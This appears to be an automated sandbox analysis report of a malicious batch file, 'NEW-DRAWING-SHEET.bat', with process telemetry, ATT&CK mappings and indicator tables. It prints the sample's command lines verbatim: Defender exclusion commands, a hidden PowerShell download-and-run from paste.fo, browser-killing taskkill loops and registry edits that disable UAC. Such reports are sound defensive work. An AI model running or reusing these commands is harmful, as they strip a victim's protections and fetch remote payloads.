          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4304
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3649
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4581
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1264
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6995
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2578
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6467
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3213
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6816
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2699
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7454
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2233
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6748
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2987
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6273
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3414
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 | Thread sleep count: 4304 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 | Thread sleep count: 3649 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 | Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep count: 4581 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep count: 1264 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\timeout.exe TID: 7988 | Thread sleep count: 65 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1136 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216 | Thread sleep count: 6995 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288 | Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220 | Thread sleep count: 2578 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524 | Thread sleep count: 6467 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556 | Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508 | Thread sleep count: 3213 > 30
          Source: C:\Windows\System32\timeout.exe TID: 8748 | Thread sleep count: 70 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 | Thread sleep count: 6816 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 | Thread sleep count: 2699 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840 | Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8924 | Thread sleep count: 7454 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952 | Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928 | Thread sleep count: 2233 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044 | Thread sleep count: 6748 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028 | Thread sleep count: 2987 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068 | Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9152 | Thread sleep count: 6273 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9148 | Thread sleep count: 3414 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188 | Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000002.1768300846.00000218F29DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW9
          Source: svchost.exe, 00000011.00000002.2922149642.000001EB8E654000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000011.00000002.2920591206.000001EB88E27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |e
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match File source: NEW-DRAWING-SHEET.bat, type: SAMPLE
          Source: Yara match File source: amsi64_7440.amsi.csv, type: OTHER
          Source: Yara match File source: amsi64_7656.amsi.csv, type: OTHER
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 7440, type: MEMORYSTR
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\reg.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 11 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Modify Registry | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 31 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 22 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph (ID: 1582348, Sample: NEW-DRAWING-SHEET.bat, Start date: 30/12/2024, Architecture: WINDOWS, Score: 100)

NEW-DRAWING-SHEET.bat (sample)
  DNS: paste.fo
  Signatures: Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; Sigma detected: PowerShell DownloadFile; 4 other signatures
  started cmd.exe
    Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Tries to download and execute files (via powershell); 2 other signatures
    started cmd.exe
      Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Tries to download and execute files (via powershell); Excessive usage of taskkill to terminate processes
      started powershell.exe
        started cmd.exe
          Signatures: Uses cmd line tools excessively to alter registry or file data; Adds a directory exclusion to Windows Defender
          started powershell.exe
            Signature: Loading BitLocker PowerShell Module
          started reg.exe
            Signature: Disables UAC (registry)
          started powershell.exe
          started 16 other processes
      started powershell.exe
        Network: paste.fo 172.67.144.225, 443, 49730 CLOUDFLARENETUS United States
        Dropped: C:\Users\user\...\BatchByloadStartHid.bat, DOS
      started chrome.exe
        Network: 192.168.2.4, 138, 443, 49585 unknown unknown; 239.255.255.250 unknown Reserved
        started chrome.exe
          Network: www.google.com 142.250.185.100, 443, 49744 GOOGLEUS United States; raw.githubusercontent.com 185.199.111.133, 443, 49731 FASTLYUS Netherlands
      started 16 other processes
    started conhost.exe
  started svchost.exe
    Network: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label
NEW-DRAWING-SHEET.bat | 34% | Virustotal |
NEW-DRAWING-SHEET.bat | 24% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

Source | Detection | Scanner | Label
https://paste.fo/raw/a1af5a4d0301 | 0% | Avira URL Cloud | safe
http://paste.fo | 0% | Avira URL Cloud | safe
https://raw.githubuserc | 0% | Avira URL Cloud | safe
https://paste.fo | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
raw.githubusercontent.com | 185.199.111.133 | true | false | | high
www.google.com | 142.250.185.100 | true | false | | high
paste.fo | 172.67.144.225 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip | false | | high
https://paste.fo/raw/a1af5a4d0301 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp | false | | high
